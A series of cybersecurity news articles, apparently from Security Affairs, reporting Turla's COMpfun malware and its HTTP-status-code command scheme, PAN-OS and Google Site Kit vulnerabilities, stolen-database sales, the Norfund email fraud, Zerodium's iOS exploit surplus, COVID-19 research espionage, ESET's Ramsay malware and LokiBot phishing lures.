Security experts from Kaspersky Lab have uncovered a new cyberespionage campaign carried out by Russia-linked APT Turla that employs a new version of the COMpfun malware. The new malware allows attackers to control infected hosts using a technique that relies on HTTP status codes.

COMpfun was first spotted in the wild in 2014 by G DATA researchers, Kaspersky first observed the threat in autumn 2019 when it was employed in attacks against diplomatic entities across Europe.

“You may remember that in autumn 2019 we published a story about how a COMpfun successor known as Reductor infected files on the fly to compromise TLS traffic.” reads the analysis published by Kaspersky. “The campaign operators retained their focus on diplomatic entities, this time in Europe, and spread the initial dropper as a spoofed visa application.”

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

In March the APT group employed two new pieces of malware in watering hole attacks targeting several high-profile Armenian websites.

The COMpfun malware analyzed by Kaspersky implements a new technique to receive commands from the C2 as HTTP status codes.

COMpfun is a remote access trojan (RAT) that could collect system data, logs keystrokes, and takes screenshots.

Turla compfun

The new variant of the COMpfun malware includes two new features, the ability to monitor when USB removable devices plugged into or unplugged from the host, and the mentioned C2 communication technique.

The first feature was implemented to allow the malware propagating itself to the connected device.

The second feature was implemented to avoid detection, Turla vxers implemented new C2 protocol that relies on HTTP status codes.

HTTP status codes provide a state of the server and instruct clients on action to do (i.e. drop the connection), COMpfun exploited this mechanism to control the bot running on the compromised systems.

“We observed an interesting C2 communication protocol utilizing rare HTTP/HTTPS status codes (check IETF RFC 7231, 6585, 4918). Several HTTP status codes (422-429) from the Client Error class let the Trojan know what the operators want to do. After the control server sends the status “Payment Required” (402), all these previously received commands are executed.” continues the analysis.

For example, if the COMpfun server would respond with a 402 status code, followed by a 200 status code, the malicious code sends collected target data to C2 with the current tickcount.

Below the list of commands associated with common HTTP status codes:

HTTP statusRFC status meaningCorresponding command functionality
200OKSend collected target data to C2 with current tickcount
402Payment RequiredThis status is the signal to process received (and stored in binary flag) HTTP statuses as commands
422Unprocessable Entity (WebDAV)Uninstall. Delete COM-hijacking persistence and corresponding files on disk
423Locked (WebDAV)Install. Create COM-hijacking persistence and drop corresponding files to disk
424Failed Dependency (WebDAV)Fingerprint target. Send host, network and geolocation data
427Undefined HTTP statusGet new command into IEA94E3.tmp file in %TEMP%, decrypt and execute appended command
428Precondition RequiredPropagate self to USB devices on target
429Too Many RequestsEnumerate network resources on target

“The malware operators retained their focus on diplomatic entities and the choice of a visa-related application – stored on a directory shared within the local network – as the initial infection vector worked in their favor. The combination of a tailored approach to their targets and the ability to generate and execute their ideas certainly makes the developers behind COMPFun a strong offensive team.” concludes Kaspersky.

Pierluigi Paganini

(SecurityAffairs – Turla, malware)

The post Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands appeared first on Security Affairs.

Palo Alto Networks addresses tens of serious issues in PAN-OS

Palo Alto Networks addressed tens of vulnerabilities in PAN-OS, the software that runs on the company’s next-generation firewalls.

Palo Alto Networks has issued security updates to address tens of vulnerabilities in PAN-OS, the software that runs on the company’s next-generation firewalls.

One of the most severe vulnerabilities, tracked as CVE-2020-2018, is an authentication bypass vulnerability in the Panorama context switching feature. The flaw could be exploited by an attacker with network access to a Panorama’s management interface to gain privileged access to managed firewalls.

“An authentication bypass vulnerability in the Panorama context switching feature allows an attacker with network access to a Panorama’s management interface to gain privileged access to managed firewalls. An attacker requires some knowledge of managed firewalls to exploit this issue.” reads the advisory published by the vendor.

This vulnerability does not impact Panorama configured with custom certificates authentication for communication between Panorama and managed devices.

The issue received a CVSSv3.1 Base Score of 9, it affects PAN-OS 7.1 versions earlier than 7.1.26, PAN-OS 8.1 versions earlier than 8.1.12, PAN-OS 9.0 versions earlier than 9.0.6, and all versions of PAN-OS 8.0.

Palo Alto Networks also addressed an XML external entity reference (‘XXE’) vulnerability, tracked as CVE-2020-2012, that could lead to information leak.

The flaw could be exploited by unauthenticated attackers with network access to the Panorama management interface to read arbitrary files on the system.

The vendor also fixed a high-severity vulnerability, tracked as CVE-2020-2011, that could be exploited by a remote, unauthenticated attacker to trigger a denial-of-service (DoS) condition to all Panorama services by sending specially crafted registration requests.

Other high severity issues affect the previous Nginx version used in PAN-OS software, some of them could be exploited without authentication.

Palo Alto Networks also addressed serious cross-site scripting (XSS) vulnerability in the GlobalProtect Clientless VPN can be exploited to compromise a user’s session by tricking the victims into visiting a malicious website.

The full list of vulnerabilities addressed by Palo Alto Networks is available here.

Pierluigi Paganini

(SecurityAffairs – PaloAlto Networks, hacking)

The post Palo Alto Networks addresses tens of serious issues in PAN-OS appeared first on Security Affairs.

Threat actors are offering for sale 550 million stolen user records

Threat actors are offering for sale tens of databases on a hacker forum that contains roughly 550 million stolen user records.

Security experts from Cyble reported that a threat actor is attempting to sell twenty-nine databases on a hacker forum since May 7. Forum members could also buy each database individually. The archives allegedly contain a total of 550 million stolen user records.

Data appears to come from past data breaches, the oldest one dates back as 2012 while the latest one dates April 2020.

The data could be used by crooks to launch credentials stuffing attacks against individuals and organizations.

Hackers are also offering for sale a separate database containing 47.1 million phone numbers that are part of Dubsmash data breach that occurred in 2018.

Below the list of databases, published by Bleepingcomputer, that are available for sale:

CompanyAmountData Breach Date
Evite.com101 millionMarch 2019
Tokopedia.com91 millionApril 2020
piZap.com60.9 millionApril 2018
Netlog.com (Twoo.com)57 millionNovember 2012
Dubsmash.com Phone numbers47.1 millionDecember 2018
Shein.com42 millionJune 2018
Fotolog.com33.5 millionDecember 2018
CafePress.com23.6 millionFebruary 2019
Wanelo.com Customers23.2 millionDecember 2018
OMGPop.com21.4 millionAugust 2019
SinglesNet.com16.3 millionSeptember 2012
Bukalapak.com13 millionFebruary 2018
Bookmate.com8 millionJuly 2018
ReverbNation.com7.9 millionJanuary 2014
Wego.com6.5 millionN/A
EatStreet.com6.4 millionMay 2019
PumpUp.com6.4 millionN/A
CoffeeMeetsBagel.com6.2 millionMay 2018
Storybird.com4 millionDecember 2018
Minube.net3.2 millionMay 2019
Sephora.com3.2 millionJanuary 2017
CafeMom.com2.6 millionApril 2014
Coubic.com2.6 millionMarch 2019
Roadtrippers.com2.5 millionMay 2019
DailyBooth.com1.6 millionApril 2014
ClassPass.com1.6 millionOctober 2017
ModaOperandi.com1.3 millionApril 2019
Rencanamu.id (Youthmanual.com)1.1 millionJanuary 2019
StreetEasy.com1 millionMay 2018
Yanolja.com1 millionMarch 2019

Users can verify if their credentials are part of one of the above breaches querying the the Cyble’s amibreached.com data breach lookup service.

Those who have their account exposed in one of the above incidents are recommended to change their password.

Pierluigi Paganini

(SecurityAffairs – threat actors, hacking)

The post Threat actors are offering for sale 550 million stolen user records appeared first on Security Affairs.

Crooks stole $10 million from Norway’s state investment fund Norfund

Norway’s state investment fund, Norfund, suffered a business email compromise (BEC) attack, hackers stole $10 million.

Hackers stole $10 million from Norway’s state investment fund, Norfund, in a business email compromise (BEC) attack.

Norfund is a private equity company established by the Norwegian Storting (parliament) in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget.

The fraudsters compromised the Norfund email system and monitored communications between the employees of the fund and their partners for months.

Once identified the employee that responsible for money transfers. the attackers created a Norfund email address to impersonate an individual authorized to transfer large sums of money through the bank Norfund.

In a classic BEC scheme, hackers replaced the payment information provided to the partners to hijack the transfer to an account under their control in a bank in Mexico.

“Through an advance data breach, the defrauders were able to access information concerning a loan of USD 10 million (approx. 100 million NOK) from Norfund to a microfinance institution in Cambodia.” reads a notice published by Norfund.

“The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified”

Norfund was not able to block the fraudulent wire transfer because the attackers managed to delay of its discovery.

The BEC attack took place on March 16, but it was discovered more than a month later, on April 30 when the fraudsters attempted to carry out a new fraud, that was detected and blocked.

To delay the discovery of the scam, the attacker sent an email to the Cambodian beneficiary informing it of a delay due to the current Coronavirus lockdown in Norway.

“This is a grave incident. The fraud clearly shows that we, as an international investor and development organisation, through active use of digital channels are vulnerable. The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this” said company CEO, Tellef Thorleifsson.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Crooks stole $10 million from Norway’s state investment fund Norfund appeared first on Security Affairs.

Zerodium will no longer acquire certain types of iOS exploits due to surplus

The popular zero-day broker Zerodium announced new limitations it the submission of certain types of iOS exploits due to surplus.

The exploit broker Zerodium announced that it’s no longer accepting certain types of iOS exploits due to surplus, this implies that prices for them will drop in the near future.

The company announced via Twitter that it would no longer accept submissions for iOS local privilege escalation, Safari remote code execution, and sandbox escape exploits, at least for the next months.

Zerodium argued that it has taken this decision due to the high number of submissions, an information that could give us an idea of how is prolific the hacking community.

Company experts believe that the prices for iOS one-click chains (e.g. via Safari) without persistence will likely drop in the next months.

Zerodium CEO Chaouki Bekrar criticized the current level of iOS security that is evidently going to zero.

“Let’s hope iOS 14 will be better,” said Chaouki Bekrar.

The decision of the company is coherent with the announcement made in September 2019 when Zerodium updated the price list for both Android and iOS exploits, with Android ones having surpassed the iOS ones for the first time.

For the first time, the price for Android exploits is higher than the iOS ones, this is what has emerged from the updated price list published by the zero-day broker Zerodium.

Currently a zero-click exploit chain for Android would be rewarded with up to $2.5 million, while an exploit chain for iOS only $2 million.

The tech giant is running a public bug bounty program through which it’s prepared to pay out up to $1 million for exploits that achieve persistence, bypass PAC and require no user interaction.

Pierluigi Paganini

(SecurityAffairs – zero-day vulnerability, hacking)

The post Zerodium will no longer acquire certain types of iOS exploits due to surplus appeared first on Security Affairs.

China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal research related to treatments and vaccines for COVID-19.

“The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are issuing this announcement to raise awareness of the threat to COVID-19-related research. The FBI is investigating the targeting and compromise of U.S. organizations conducting COVID-19-related research by PRC-affiliated cyber actors and non-traditional collectors.” reads the joint alert. “These actors have been observed attempting to identify and illicitly obtain valuable intellectual property (IP) and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.”

“The F.B.I. and the Department of Homeland Security are preparing to issue a warning that China’s most skilled hackers and spies are working to steal American research in the crash effort to develop vaccines and treatments for the coronavirus. The efforts are part of a surge in cybertheft and attacks by nations seeking advantage in the pandemic.” reported The New York Times.

“These actors have been observed attempting to identify and illicitly obtain valuable intellectual property and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research,” reads a statement from the FBI and the CISA.

“China’s efforts to target these sectors pose a significant threat to our nations response to COVID-19”.

The US agencies recommend targeted organizations to adopt cybersecurity best practices to prevent state-sponsored hackers from stealing COVID-19-related material.

“What else is new with China? What else is new? Tell me. I’m not happy with China.” President Trump commented. “We’re watching it very closely,”.

“China’s long history of bad behavior in cyberspace is well documented, so it shouldn’t surprise anyone they are going after the critical organizations involved in the nation’s response to the Covid-19 pandemic,” said Christopher Krebs, the director of the Cybersecurity and Infrastructure Security Agency. He added that the agency would “defend our interests aggressively.”

The Chinese Government rejected the allegation Beijing on Monday.

“We are leading the world in COVID-19 treatment and vaccine research. It is immoral to target China with rumors and slanders in the absence of any evidence,” Foreign Affairs ministry spokesman Zhao Lijian said.

The Chinese government is not the only one interested in COVID-19 research, nation-state hackers from Russia, Iran, and North Korea are launching spear-phishing and misinformation campaigns in the attempt to target organizations and scientists involved in the vaccine research.

Last week the US and the UK issued a joint alert to warn of the rise in cyber attacks carried out by foreign states against healthcare organizations and researchers.

This is my interview on the topic at TRT World

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post China-linked hackers are attempting to steal COVID-19 Vaccine Research appeared first on Security Affairs.

Google WordPress Site Kit plugin grants attacker Search Console Access

Experts found a critical bug in Google’s official WordPress plugin ‘Site Kit’ that could allow hackers to gain owner access to targeted sites’ Google Search Console.

The Site Kit WordPress plugin makes it easy to set up and configure key Google products (i.e. Search Console, Analytics, Tag Manager, PageSpeed Insights, Optimize, and AdSense), giving users authoritative and up-to-date advice on how to succeed on the web, it has over 300,000 active installations.

Experts from Wordfence found a critical bug in the ‘Site Kit’ plugin that could be exploited by authenticated attackers to gain owner access to targeted sites’ Google Search Console.

“This flaw allows any authenticated user, regardless of capability, to become a Google Search Console owner for any site running the Site Kit by Google plugin.” reads the analysis published by Wordfence.

Site Kit

The vulnerability is caused by the disclosure of the proxySetupURL contained in the HTML source code of admin pages, it is used to redirect a site’s administrator to Google OAuth and run the site owner verification process through a proxy.

“In order to establish the first connection with Site Kit and Google Search Console, the plugin generates a proxySetupURL that is used to redirect a site’s administrator to Google OAuth and run the site owner verification process through a proxy.” continues the analysis.

“Due to the lack of capability checks on the admin_enqueue_scripts action, the proxySetupURL was displayed as part of the HTML source code of admin pages to any authenticated user accessing the /wp-admin dashboard.”

Experts also noticed another issue related to the verification request used to verify a site’s ownership was a registered admin action fails to check whether the requests to come from any authenticated WordPress user.

Chaining the two vulnerabilities it is possible to achieve the ownership of the Google Search Console allowing an attacker to modify sitemaps, remove pages from Google search engine result pages (SERPs), or to facilitate black hat SEO campaigns.

“These two flaws made it possible for subscriber-level users to become Google Search Console owners on any affected site,” continues Wordfence.

“An owner in Google Search Console can do things like request that URLs be removed from the Google Search engine, view competitive performance data, modify sitemaps, and more. Unwarranted Google Search Console owner access on a site has the potential to hurt the visibility of a site in Google search results and impact revenue as an attacker removes URLs from search results. More specifically, it could be used to aid a competitor who wants to hurt the ranking and reputation of a site to better improve their own reputation and ranking.”

The good news is that Google sends an email alert when a new Google Search Console owners have been added allowing admins to remove the unknown owner.

As an extra precaution, admin can also reset the WordPress Site Kit connection so that they will have to reconnect all previously connected Google services.

Wordfence discovered the privilege escalation issue on April 21 and reported to Google on April 22.

Google addressed the vulnerability on May 7 with the release of Site Kit 1.8.0.

At the time of writing over 200,000 website owners have updated their Site Kit plugins, but over 100,000 sites are still vulnerable.

Pierluigi Paganini

(SecurityAffairs – Site Kit, hacking)

The post Google WordPress Site Kit plugin grants attacker Search Console Access appeared first on Security Affairs.

New Ramsay malware allows exfiltrating files from air-gapped computers

Experts discovered a new strain of malware dubbed Ramsay that can infect air-gapped computers and steal sensitive data, including Word, PDF, and ZIP files.

Researchers from security firm ESET discovered a new advanced malware framework named Ramsay that appears to have been designed to infect air-gapped computers and exfiltrate sensitive data.

The malicious code collects sensitive files, including Word, PDF, and ZIP files, in a hidden storage folder, then waits for the opportunity to exfiltrate them.

“ESET researchers have discovered a previously unreported cyber-espionage framework that we named Ramsay and that is tailored for collection and exfiltration of sensitive documents and is capable of operating within air‑gapped networks.” reads the report published by ESET.

The malware was specifically designed to jump the air gap and reach computers withing the isolated networks to steal sensitive information.

The researchers found a sample of the Ramsay after it was uploaded to VirusTotal from Japan, then they discovered further components and versions of the framework, a circumstance that suggest the framework is still under active developmental stage.

Experts speculate that at least three variants of the malware exist, tracked as v1, v2.a, and v2.b. Ramsay v1 was first compiled in September 2019, and is also the least complex.

The v2.a and v2.b samples have been compiled on March 8 and March 27, respectively, both include a rootkit component, but experts noticed that only 2.a implements spreading capabilities.

Experts report that the less complex versions of the malware are dropped by weaponized documents exploiting CVE-2017-0199 and CVE-2017-11882, RCE vulnerabilities.

The Ramsay v2.a is delivered using a fake installer for the 7-zip file compression utility.

ramsay

Ramsay allows attackers to collect all Microsoft Word documents on the target computer, most recent variants are also able to exfiltrate PDF files and ZIP‌ archives on network drives and removable drives.

ESET researchers were not able to identify any Ramsay exfiltration module used by the malicious code.

ESET did not attribute the Ramsay malware to a specific threat actor, researchers only notice some similarities with the Retro malware family employed by the DarkHotel APT group.

“Based on the different instances of the framework found Ramsay has gone through various development stages, denoting an increasing progression in the number and complexity of its capabilities. Developers in charge of attack vectors seem to be trying various approaches such as old exploits for Word vulnerabilities from 2017 as well as deploying trojanized applications.” concludes ESET.

“We interpret this as that developers have a prior understanding of the victims’ environment and are tailoring attack vectors that would successfully intrude into targeted systems without the need to waste unnecessary resources.”

Pierluigi Paganini

(SecurityAffairs – Ramsay malware, hacking)

The post New Ramsay malware allows exfiltrating files from air-gapped computers appeared first on Security Affairs.

Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

Microsoft has discovered a new COVID-19 themed phishing campaign targeting businesses with the LokiBot Trojan.

Lokibot was already employed in Coronavirus-themed campaigns, early of April, security experts at FortiGuard Labs discovered phishing attacks using alleged messages from the World Health Organization (WHO) to deliver the LokiBot trojan.

COVID-19 themed phishing campaigns recently observed by Microsoft was using messages with subject lines like “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020.”

The LokiBot data stealer is able to collect information from tens of different web browsers, access to browsing data, locate the credentials for more than 15 different email and file transfer clients, and check for the presence of popular remote admin tools like SSH, VNC and RDP.

One of the phishing campaigns observed by Microsoft sees attackers pretending to be from the Centers for Disease Control (CDC), the messages promise latest information on the COVID-19 pandemic and a new “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020”.

Another campaign use messages that pretend to be from a vendor asking for updated banking information to process payments due to the COVID-19 virus lockdown.

The emails in both campaigns use ARJ attachments that contain malicious executables disguised as PDF files.

The choice of password-protected ARJ files aims at bypassing some security solutions. Upon opening the enclosed files, the infection process will start to finally deliver the LokiBot Trojan.

Microsoft pointed out that its Microsoft Threat Protection’s machine learning algorithms were able to detect the campaign, Microsoft users are automatically protected by the Microsoft Defender.

“Microsoft Defender’s advanced detection technologies, including behavior learning and machine learning, started blocking this attack right away. We used deeper analysis of the blocked attacks, which helped us to identify the end-to-end campaign detailed,” Tanmay Ganacharya, director of security research of Microsoft Threat Protection, told BleepingComputer.

“We see a lot of benefits of leveraging machine learning and we are in a very unique position here at Microsoft because of the quality and diversity of our 8.2 trillion signals we process daily through the Microsoft Intelligent Security Graph.” 

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Crooks continues to use COVID-19 lures, Microsoft warns appeared first on Security Affairs.